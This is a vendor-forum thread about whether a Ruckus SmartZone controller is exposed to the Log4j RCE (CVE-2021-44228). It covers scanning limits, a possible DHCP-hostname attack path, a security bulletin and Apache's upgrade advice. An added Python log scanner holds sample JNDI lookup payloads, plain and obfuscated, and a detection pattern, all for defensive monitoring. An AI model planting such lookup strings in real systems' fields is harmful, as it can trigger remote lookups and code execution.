12-12-2021 05:51 PM
Hello.
Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.
The customer asked if the SmartZone has the following security vulnerability.
** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE
Thank you for your valuable answers to the above questions.
12-15-2021 04:19 AM
No information on that part so far. I would update here as soon as I hear one.
Best Regards
Vineet
12-15-2021 06:02 AM
Hi Bjarne,
we ran a security scan (CERT BSI and so on included - only TCP - takes several hours) over our AP control interfaces (vSZ-H) with 5.2.2.0.1161. It just complained about icmp uptime being spoofable, weak ssh key support from DSA and SHA1 support (I think this has to do with the CentOS 7 underneath it and maybe support of older APs). No log4j complaint from it - but Ruckus needs to confirm.
12-15-2021 07:48 AM
no cert scan / port scan will find this vulnerability. You need to be monitoring both the log files as well as an upstream DNS server to see if the system is issuing queries. I doubt any of the scanning tools claim to find this and/or have been updated so quickly as to add the attack. It would require you to point smartzone to a particular dns server and the attack would be via API fields which most tools do not scan in depth. Personal testing (and others here on this thread) have shown the system to be vulnerable, at the very least, to information disclosure attacks through jndi / log4j.
It's different for a WAF (web application firewall) that can look at the API calls being made to smartzone. The problem here is that smartzone potentially has multiple attack vectors outside of the API channel, where data sent FROM the AP could trigger this. For example, a maliciously named client uses the ${jndi string as its dhcp hostname. I have not verified this path of exploitation, but so much user-related data is sent to the controller and logged that the risk is extremely high.
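One way to do the log-file monitoring described in the post above, as an added example (not code from this thread or from Ruckus): a small Python scanner run over constructed sample log lines, which first collapses the nested `${lower:..}` / `${..:-..}` lookup tricks so an obfuscated `${jndi:` marker is still caught. Hostnames and the `example.invalid` URL are constructed placeholders.

```python
import re

# Constructed sample log lines (not taken from a real controller): a benign
# client join, a plain JNDI lookup in a DHCP hostname, an obfuscated lookup in
# an API user-agent field, and another benign entry.
SAMPLE_LOG_LINES = [
    "2021-12-15 07:48:01 INFO client joined ssid=Guest hostname=laptop-42",
    "2021-12-15 07:48:05 INFO client joined ssid=Guest hostname=${jndi:ldap://example.invalid/a}",
    "2021-12-15 07:48:09 INFO api call user-agent=${${lower:j}ndi:${lower:l}dap://example.invalid/b}",
    "2021-12-15 07:48:12 INFO client joined ssid=Guest hostname=printer-7",
]

# ${lower:x} / ${upper:x} evaluate to x; ${anything:-x} evaluates to its default x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The marker that matters once the nesting is resolved: ${jndi:<protocol>:
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE
)


def normalize(text):
    """Resolve innermost lookups repeatedly until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

The same normalisation step is what makes a DNS-side check useful: the resolved string is what shows which outbound name the controller would have looked up.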
12-15-2021 08:43 PM
The v1.2 update to the Security Bulletin is now live in the Support Portal at https://support.ruckuswireless.com/security_bulletins/313 and the files will be mirrored on the www page in the morning: https://www.commscope.com/security-bulletins/
Allan.
12-15-2021 11:13 PM
@allan_grohe Thanks for the update. But it is really unclear how we get this update. Will this be a general download, or does it need to be requested from customer support?
And will the fix include the latest recommendation from Apache LOG4J?
Because it seems that the first mentioned mitigation strategies are not sufficient. See recent announcement:
https://logging.apache.org/log4j/2.x/security.html#History
Cite: "This page previously mentioned other mitigation measures, but we discovered that these measures only limit exposure while leaving some attack vectors open.
...
The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar."
Safe version would be the latest 2.16